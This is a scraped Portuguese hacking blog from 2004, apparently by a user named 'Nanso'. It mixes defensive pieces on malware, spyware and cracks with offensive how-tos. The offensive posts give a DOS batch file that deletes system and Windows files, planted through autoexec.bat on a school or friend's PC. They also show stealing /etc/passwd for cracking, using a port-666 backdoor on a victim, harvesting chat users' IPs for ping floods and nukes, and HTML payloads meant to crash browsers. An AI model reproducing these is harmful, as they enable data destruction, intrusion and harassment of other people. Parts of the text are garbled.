Sei sulla pagina 1di 9

Transformando Shareware em Freeware Sabe aqueles sharewares que deixam o usuario usar o programa completo por um mes e depois

se auto-desinstalam do sistema?? Eles tem uma falha bem visivel que mu itas pessoas jah devem ter percebido. Eles armazenam a data de instalacao em um arquivo ou setor do disco e quando completam 30 dias depois da data de instalaca o, impossibilitam a sua execuao a menos que se registre-o. Para que esses 30 dias nao chegem tao rapido, basta modificar a data do seu computador. Para traz e' claro. DICA: As datas de 11 em 11 anos se repetem, ou seja.. 26/9/1998 - sabado. 11 anos antes: 26/9/1987 - sabado. +11 anos atraz: 26/9/1976 - sabado. Ai ento os dias da semana bateram com os dias do mes, e voc no se atrapalhar todo, s ficara 11 anos atrasado. Escrito por Nanso s 01h17 [ (0) Comente ] [ envie esta mensagem ]

Como fazer um arquivo para encher o HD Crie um diretorio temporario, exemplo: C:\LIXO. Edite um arquivo do tipo X.BAT, atraves do EDIT do DOS e monte o seguinte programa conforme as linhas abaixo. @ECHO OFF DIR >> ENCHE :ENCHE TYPE ENCHE >> ENCHE CLS ECHO ENCHENDO AGUARDE... GOTO ENCHE Pronto, o programinha esta feito, ela ira criar cada vez um arquivo maior com o nome enche no C:\LIXO. E para que usar um programinha inutil destes? Simplesmente para testar o disco rigido, o CPU nao pode travar com o HD enchendo, nem quando ele ficar cheio, se o CPU travar eh porque o HD esta com problema, se ele aguentar ateh nao ter mais espaco o HD nao tem problema. Para cancelar a operacao, pressione CTRL+C ... Atencao, voce pode formatar um HD e fazer este teste, e ver se o HD esta OK, o HD pode estar todo deletado, ou pode ser um HD usado, com 100Mb livre um de 1.2Gb ou um com 70 ou 60Mb de 1.0Gb, etc... e rodar o programa, para testar neste HD, e quando o HD encher voce ve se esta OK ou nao. Quando der problema, o problema pode ser do CPU ou MB as vezes. Depois que rodar o programa eh soh deletar o diretorio LIXO e ele desenche o HD! Nunca rode isto no PROMPT do DOS do WIN 3.1 ou principalmente no WIN 95, que o CPU ira travar. Se este for seu caso, entre antes em MODO Somente prompt ou MODO MS-DOS.

Escrito por Nanso s 01h15 [ (0) Comente ] [ envie esta mensagem ]

Colocando som na sala de bate-papo http://jacinto.pinto.aqui.no.rego.com/figura.jpg" onload="window.open('http://jacinto.pinto.aqui.no.rego.com/som.wav')"> . Se isso no funcionar tente isso Clique aqui pra olvir um som - Isso faz quem clikar no link ouvir o som. Mudando o tamanho e a cor da letra na sala de bate-papo O tamanho pode ser alterado usando o comando < font size="TAMANHO" > O tamanho de 1 at 7 , a cor da letra pode ser alterado usando o comando ome da cor em ingls exempo Descobrindo Senhas Se voc est afim de pegar senhas para o seu uso, leia atentamente as instrues abaixo: 1. O jeito mais facil de pegar senhas, fazendo o download do arquivo passwd, que fica no diretorio /etc do provedor. Neste arquivo, esto armazenado os logins, se nhas cryptografadas e outros dados de todos os 'users' daquele provedor. Na maio ria dos lugares o arquivo passwd contido no diretorio /etc, vem com um chamado s hadow. O que seria shadow? Shadow, quando o arquivo passwd nao vem com as senhas cryptografadas. Ele vem co m um * no lugar da senha. Abaixo voc tem um exemplo de um passwd com shadow. kaneko:*:118:100:Take7:TaniKayoko:/home/students/makizono/s974076:/bin/csh E com esse shadow, no da pra voc descryptografar as senhas. Mais existe um jeito d e tirar esse shadow! Basta voce usar o programa "unshad.c". Se o arquivo passwd estiver sem shadow, no ser necessrio a utilizacao desse programa. Abaixo, um exemplo de um passwd sem shadow. galvao:r2ln6GlgXEIVg:2201:2001:Geraldo P. Galvao:/home/galvao:/bin/csh No exemplo mostrado, a senha cryptografada "r2ln6GlgXEIVg" 2.Descryptografando as senhas Bom, j falamos da parte de download do passwd agora, vamos falar de como se descr yptografa as senhas. Para descryptografar as senhas, voc precisara de um cracker (Programa usado para descryptografar senhas) Ex.: CrackJack 3.Como usar o programa unshad.c Usar o programa unshad.c, muito fcil. Basta voc fazer um upload dele pra sua shell , e quando ele ja estiver na shell, digite "cc -o unshad unshad.c" para compilalo. Aps a compilacao, basta digitar "./unshad" e as shells se abriram sem o shado w. Hackeando sua escola CoR o n

Este texto ir ensinar, de modo fcil, destruir o computadorzinho da sua escola (ou de amigo, trabalho, etc.). Primeiro, crie em seu computador um arquivo de lote (nem precisa compilar), se no souber a vai, pelo DOS digite: copy con arquivo.bat ENTER @echo off ENTER @echo Frase de sua preferncia ENTER del *.sys ENTER del *.exe ENTER del *.com ENTER cd windows ENTER del *.* ENTER cd\ ENTER del arquivo.bat ENTER @echo Frase de sua preferncia ENTER Aperte F6 ENTER Pronto, um arquivo vrus de lote foi criado em seu computador, ele no far nada conta nto que voc no digite "arquivo" no diretrio onde ele est. Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "Autoexec.bat ", com a linha de comando: C:\arquivo.bat. Agora com voc! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e qu ando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretrio C:\. Pronto! Retire o disco e diga tchau. Escrito por Nanso s 00h31 [ (0) Comente ] [ envie esta mensagem ]

28/09/2004 Como detonar o Pc de algum Comando: <img src="file:///a:/34646xx"> <img src="file:///a:/34646xy"> <img src="file:///a:/34646xz"> <img src="file:///d:/34646xx"> <img src="file:///d:/34646xx"> <img src="file:///e:/34646xx"> Obs: Tudo junto na mesma linha de mensagem

Escrito por Nanso s 14h25 [ (0) Comente ] [ envie esta mensagem ]

Invaso pela porta 666

uma invaso fcil, mas voc ir precisar do programa Aabout (www.dolphinsys.com).E a vti a tambm. Procedimento: Primeiro voc deve contactar a vtima e faz-la executar o programa Aabout, depois ent re no telnet do windows (C:\windows\telnet.exe). V ao menu Conectar e clique em S istema Remoto. Vai aparecer uma tela para o login. Como host, coloque o IP dinmic o da vtima e como porta, digite 666. Clique em conectar. No login, digite a palavra gr! ( 'gr' com o ponto de exclamao) Agora aparece um PROMPT, no qual voc tem controle total sobre o PC da vtima. Use o s comandos do DOS. Original de Virtual Murder revisado por Blawnsteim. Escrito por Nanso s 14h22 [ (0) Comente ] [ envie esta mensagem ]

26/09/2004 Oque so vrus, worms e trojans muito comum ler-se matrias (inclusive neste prprio site) em que palavras como vrus e worm so usadas indistintamente para se referir mesma coisa. Apesar de esta mist ura de termos ser admissvel para o entendimento comum, h diferenas conceituais entr e eles. E sobre estas diferenas que a empresa Panda Software tratou em seu boleti m desta quinta-feira. Todos os tipos de cdigos malficos podem ser englobados na categoria de malware (ma licious software), que se define como programa, documento ou mensagem passvel de causar prejuzos aos sistemas. O grupo de malware mais abundante o dos vrus, que se gundo a Panda pode ser dividido em trs subgrupos: vrus propriamente ditos, worms e trojans ou cavalos de Tria. Veja, abaixo, as definies dadas pela empresa, acrescid as de algumas outras informaes conhecidas: Vrus - so programas de informtica capazes de multiplicar-se mediante a infeco de outr os programas maiores. Tentam permanecer ocultos no sistema at o momento da ao e pod em introduzir-se nas mquinas de diversas formas, produzindo desde efeitos simples mente importunos at altamente destrutivos e irreparveis. Worms - similares aos vrus, com a diferena de que conseguem realizar cpias de si me smos ou de algumas de suas partes (e alguns apenas fazem isso). Os worms no neces sitam infectar outros arquivos para se multiplicar e normalmente se espalham usa ndo recursos da rede (o e-mail o seu principal canal de distribuio atualmente). Trojans ou cavalos de Tria- so programas que podem chegar por qualquer meio ao com putador, no qual, aps introduzidos, realizam determinadas aes com o objetivo de con

trolar o sistema. Trojans puros no tm capacidade de se auto-reproduzir ou infectar outros programas. O nome cavalo de Tria deriva do famoso episdio de soldados greg os escondidos em um cavalo de madeira dado como presente aos troianos durante a guerra entre os dois povos. Segundo a empresa antivrus, a classificao acima tende a ser revista em um futuro no muito distante, devido apario de novos tipos de malware que renem caractersticas de mais de um grupo ao mesmo tempo. Um exemplo so os chamados worm/trojans, que como indica o nome incorporam caractersticas destes dois tipos de cdigos malficos. Os m alware tambm esto se tornando cada vez mais sofisticados, particularmente na forma de propagao. De fato, j existem exemplares que se propagam diretamente atravs da In ternet, segundo a Panda. Escrito por Nanso s 23h31 [ (0) Comente ] [ envie esta mensagem ]

Dicas contra Spywares ~~~~~~~~~~~~~~~~~~~~ Oq Spywares Spyware um pequeno programa instalado indevidamente em seu computador, geralment e sem que voc veja os passos de instalao. Programas deste tipo, costumam ter as mai s diversas finalidades, como espionar a navegao do internauta pela Internet ou obs ervar o tempo que ele fica conectado. De posse dessas informaes, o desenvolvedor d o spyware pode vender estes dados a empresas de SPAM ou de marketing digital. Ou ainda, passa a exibir automaticamente janelas pop-up com propagandas. Spywares mais ousados, fazem com que voc s consiga visitar determinados sites ou ainda usam seu computador para armazenar arquivos indevidos, como imagens pornogrficas. Tam bm h aqueles que capturam informaes sigilosas, como senhas digitadas. Em alguns caso s, o spyware acaba consumindo muita memria e o usurio pensa que seu computador apr esenta algum problema. A questo, que existem spywares para as mais diversas final idades. Veja a seguir, 10 dicas para evitar estes programas. 1-Cuidado com programas desconhecidos

Muitos spywares so instalados em seu computador, quando voc instala algum aplicati vo. muito comum encontrar tocadores de MP3 e vdeo, aceleradores de Internet, jogo s e utilitrios gratuitos e atraentes. A maioria realmente executa o que promete, mas em troca desta "gratuidade" instala um ou mais spywares em seu computador e voc nem faz idia. Um dos programas que ficou conhecido por ter estas caractersticas o KaZaA, software para compartilhamento de arquivos em redes P2P. Muitos usurios deste programa, sabendo da existncia de spywares, instalam uma verso conhecida co mo KaZaA Lite, desenvolvida por programadores que no acrescentam spywares ao soft ware. Quando for instalar um programa, procure em sites de buscas, listas de dis cusso ou fruns, opinies e recomendaes sobre o software em questo. Fazendo esta pesqui a, voc certamente saber se aquele software realmente vale a pena. Se no encontrar i nformao nenhuma, evite instalar o programa e procure por alternativas conhecidas. 2-Propaganda pode ser Spyware Voc instalou um programa freeware em seu computador e descobre que ele exibe prop agandas. Se no site do desenvolvedor do software no houver nenhum aviso sobre exi bio de publicidade, quase certo que aquele programa um spyware. Desinstale-o imedi atamente. 3-Leia a licensa

Se for inevitvel instalar um programa desconhecido, leia a licena de uso. Nela, vo c poder descobrir se para usar o software, ter que concordar em utilizar outro. 4-Cuidado com instalaes oferecidas aps visitar um site muito comum em sites que usam direcionadores ou servios de hospedagem gratuita, a parecer uma janela perguntando se voc deseja instalar um determinado aplicativo ( ou plugin) ou no. Muitas vezes esses programas so certificados e no possuem aes duvid osas. No entanto, esse programa pode ter funcionalidades extras, que voc obrigado a aceitar ao instal-lo. Dentre estas funcionalidades, pode estar a exibio automtica de propagandas. Por isso, muito cuidado. A imagem abaixo mostra uma janela dest as. Na dvida, clique no link do programa (em azul) para ler sua licena. Lembre-se que alguns programas confiveis utilizam esse tipo de instalao, como o plugin para F lash. Da a importncia de verificar a licena e procurar opinies sobre o software. 5-Cuidado com sites pornogrficos ou de contedo hacker Sites pornogrficos ou de contedo hacker podem ter scripts escondidos e que instala m spywares em seu computador. Muitas vezes, voc clica numa imagem para v-la amplia da, mas ao invs disso, aparece um tela com um "Sim ou No ("Yes, No"). Mesmo se voc clicar em No, a instalao do spyware pode ser iniciada. Em outros casos, o site diz que necessrio voc instalar um programa para ter acesso ao site ou para visualizar as fotos. Neste caso, pode ter certeza, trata-se de um spyware, ou at mesmo de al go mais grave, como um cavalo-de-tria. Alguns sites hackers oferecem programas "f antsticos", como softwares que lhe do o poder de derrubar internautas em salas de bate-papo ou que permite ver a conversa de usurios no reservado. Independente de qual for a oferta, desconfie sempre. Em sites pornogrficos, se estes exibem um mo nte de propagandas ou abrem janelas para outros sites sem parar, evite-os. H gran des chances de haver spyware entre o contedo destes endereos. 6-Use o Opera Se por alguma razo, for inevitvel visitar sites pornogrficos ou de contedo hacker, a o menos use um navegador diferente. Uma boa escolha o Opera. Muitos scripts mali ciosos e que possuem a funo de instalar ou ativar spywares, geralmente s funcionam no Internet Explorer. Assim, alternativas como o Opera ou o Mozilla, so um timo me io de evitar spywares. 7-Verifique a existncia de spywares regularmente Mesmo que voc tome todos os cuidados necessrios para evitar spywares, algum usurio do computador talvez possa no ser to cuidadoso. Assim, use regularmente programas que rastream spywares. H timas opes atualmente, sendo os mais conhecidos o Ad-Aware e o Spybot. Ambos possuem verses gratuitas e eficazes, alm de no serem difceis de co nfigurar. 8-Atualize seu anti-spyware Se voc j usa algum programa contra spywares, no esquea de atualiz-lo. Assim como acon tece com os vrus, novos spywares surgem periodicamente. 9-Sintomas de um spyware H spywares que agem silenciosamente, enquanto outros do claros sinais de existncia. Se a pgina inicial do seu navegador foi alterada, se propagandas so exibidas cons tantemente, se h uma barra com funes extras no Internet Explorer ou em outro progra ma, se uma janela para conectar-se Internet aparece a todo instante, se sites ab rem sozinhos, enfim, esteja ciente: h grandes chances de haver um spyware por trs disso.

10-Use firewall Essa dica vlida principalmente para administradores de rede: use um firewall. Est e, se devidamente configurado, pode barrar a ao de spywares e evitar, inclusive, q ue dados sigilosos sejam enviados pela Internet. Escrito por Nanso s 19h48 [ (0) Comente ] [ envie esta mensagem ]

Oq Crackers? Voc sabe o que um Crack? J usou para ativar algum programa pelo qual voc no pagou? Preparamos essa matria para mostrar a verdade por trs dos Cracks e os riscos que e les oferecem. Os Cracks so programas feitos para desbloquear e desproteger programas pelos quai s, na maioria dos casos, voc deveria pagar para poder utilizar. So facilmente enco ntrados na Internet e existem vrios sites criados com a finalidade nica de distrib u-los. Mas o que muitos no sabem que utilizar um Crack uma atividade ilegal, e alm de tud o perigosa. ainda pior do que piratear um programa, pois alm de no pagar pelo prog rama voc altera seu cdigo original, o que tambm crime. Muitas pessoas que utilizam Cracks brincam com isso se gabando para os amigos. O s comentrios so sempre os mesmos*: Pra que pagar se posso Crackear? O Bill Gates j t rico mesmo! No sei de nada. No fui eu que fiz o Crack. Arruma 'aquele' registrinho esperto pra mim? No meu micro tudo 'registrado'! Hehehehe! Astalavista baby!

Agora pense na ingenuidade daquele que se utiliza de um Crack. Primeiro ele vai em um site que distribui Cracks, que provavelmente no foi feito por algum bem intencionado. Depois faz o dowload de um Crack do qual ele desconhece o autor. E por fim roda o Crack, desse autor completamente desconhecido, no seu micro. Depois as conversas mudam*: Acho que algum est entrando no meu micro!! Tinha um NetBus no meu micro! No sei como entrou! Perdi tudo no meu HD. Como pode? Algum hacker invadiu meu micro! Invadiram meu site! Roubaram minha senha do banco!

E finalmente, mas no menos trgico: - Vieram aqui na empresa e fui multado por causa dos programas sem licena que eu

tinha 'crackeado'. Quebrei! Quem ser que me denunciou? Hmmm... ser que foi o Crack? Certamente quem roda um Crack no seu micro nem pra para pensar que ele pode conte r trojans. Os trojans (cavalos-de-tria) so programas que parecem fazer uma coisa e na verdade fazem outra, de forma oculta. Enquanto a pessoa roda aquele crakezinho para registrar seu programa ele se inst ala na memria do micro e fica monitorando suas atividades, capturando senhas, nmer os de carto de crdito, dados bancrios, enfim, tudo o que interessar ao autor do Cra ck. Muitos Cracks tambm podem instalar no micro da 'vtima' (vtima?) uma espcie de progra ma servidor para que 'algum' possa acessar e operar seu micro remotamente. E no h anti-vrus que proteja isso. Pois o anti-vrus no tem como bloquear o uso de um programa que voc mesmo instalou e acionou. Se ele fizesse isso voc no rodaria nenhu m programa no seu micro. Os anti-vrus s detectam trojans conhecidos. Os cracks so l anados com muita frequncia e caso contenham algum trojan desconhecido, muito difcil que o anti-vrus o reconhea. A melhor forma de inibir a ao de um trojan que transfere dados atravs de um firewal l que monitore o acesso de programas rede. Esse tipo de firewall avisa voc sempre que algum programa tenta enviar ou receber dados sem que tenha sido autorizado por voc. No BD voc encontra alguns firewalls que possuem esse recurso: ZoneAlarm, Outpost Firewall e Sygate Personal Firewall. Veja na seo 'Segurana' do BD. Agora voc j sabe os riscos que est correndo! Crack, no mundo da informtica, tambm 'droga'! Pense nisso antes de instalar e rodar no seu micro um Crack ou qualquer outro pr ograma obtido de fonte no confivel. Os Cracks no so os nicos programas que podem cont er trojans e nem todos os cracks possuem trojans (o que no quer dizer que no sejam programas criminosos). Escrito por Nanso s 14h45 [ (0) Comente ] [ envie esta mensagem ]

Oq IP Ip conhecido no mundo todo como um nmero de identificaa pois cada computador possui o seu. O trabalho hacker de hoje em dia no assim to grande pois tudo o que ele te m, que fazer descobrir o IP da pessoa que ele quer invadir (descobrir o IP possi vel atravs de programas criados pelos prprios hackers ou at mesmo pelo prprio ICQ co m o programa certo). Aps ele descobrir o IP que o mais difcil ele simplesmente uti liza os programas destinados a invaso como o Wincrash, Netbus e muitos outros. No esquecendo que existem outros mtodos de invaso. Escrito por Nanso s 13h22 [ (0) Comente ] [ envie esta mensagem ]

Descobrindo IP 1- Descobrindo o IP ou Host de uma provedora : Encontre no seu micro, o atalho o u aviso do MS-DOS. Clique nele, dever surgir uma tela preta com a seguinte aparnci a: C:\WINDOWS> Nele digite: ping www.provedoraquevocquer. com.br Ficando assim: C :\WINDOWS> PING www.provedoraquevocquer.com.br Ser retomado o Host da provedora bb s e etc... Quem sabe depois voc comea a brincar de TeInet? 2- Eu tenho o IP e no se i a provedora. Digite no prompt do MS - DOS: tracert ipdocara Ficando assim : C: IWINDOWS>TRACERT ipdocara Ser retornado o nome da provedora do cara, s prestar ate no!! 3- Pegando IP em chat: Feche todos os seus aplicativos de rede, ICQ, FTP, XIT AMI..., que voc estiver usando. Feche todos os navegadores que no sejam da sala ao nde o cara se encontra lgico! Concentre-se s na sala do chat na qual se encontra o cara que voc quer pegar o ip. Pea as pessoas que esto conversando com voc para para rem de te mandarem mensagens, quando isto acontecer mande algumas mensagens em s equncia para vitima, voc aprende isto na parte de chat desta HP. Alterne para o se u MS-DOS (ALT +TAB) , na hora e digite: arp -a Ficando assim: C:IWWDOWS> arp -a Neste momento sero retomados, vrios IP'S, ( 4 6 em mdia). O primeiro o IP da sala a onde voc se encontra. Entretanto, na "MAIORIA DAS VEZES" o segundo IP do gafanhot o que voc quer mandar para os sapos ! Se voc no tem certeza e deseja confirmar isto , guarde o IP e compare com as informaes que voc tem sobre a vtima (rovedora por exe mplo). Se voc no sabe nada dela, pacincia, pegue todos os IP's e nuke um um, ou faa um ping flood que ser explicado abaixo, ou repita o procedimento acima vrias vezes e guarde os IP'S que esto repetindo com mais frequncia. E tome as medidas que des ejar. 4- Meu nuke no funciona: Tente o seguinte comando no prompt do MS-DOS: ping -f-l1000 -t ipdocara ou ping -t -11000 -f ipdocara Ficando assim: C:\WINDOWS>pi ng -f-11000 -t ipdocara ou C:\WINDOWS>ping -t -11000 -f ipdocara Repita o proced imento ate ele cair. Lembre-se de que, quanto mais pessoas fazendo junto com voc, mais rpido ser o tombo :-))) 5- Partindo para o desespero: Pegue um pense na part e de programas desta HP. Passe nas portas do micro do gafanhoto. Observe as que esto sem proteo e nuke! A maioria dos nukes vem designado as portas 137, 138, 139. Ento mude e "meta os ferro" nas portas que esto sem proteo. 6- Partindo para o deses pero a beira de um ataque de nervos: Passe o programa portscan nas portas do mic ro da vtima constantemente, ping o micro do cara como na lio 4. O "inimigo" no mnimo vai ficar urna lerdeza hehehehe... Se voc quiser arriscar, nuke ao mesmo tempo. Aviso: quem pode perder a conexo voc! 7- No deu certo!!! : Mude seu XT, com 4 megas de memria RAM e modem de 14.400 de conexo inferior a capacidade do mesmo para um micro decente e uma verdadeira provedora 8.12.218.126 8.12.26.206.126 10.58.55.42

Potrebbero piacerti anche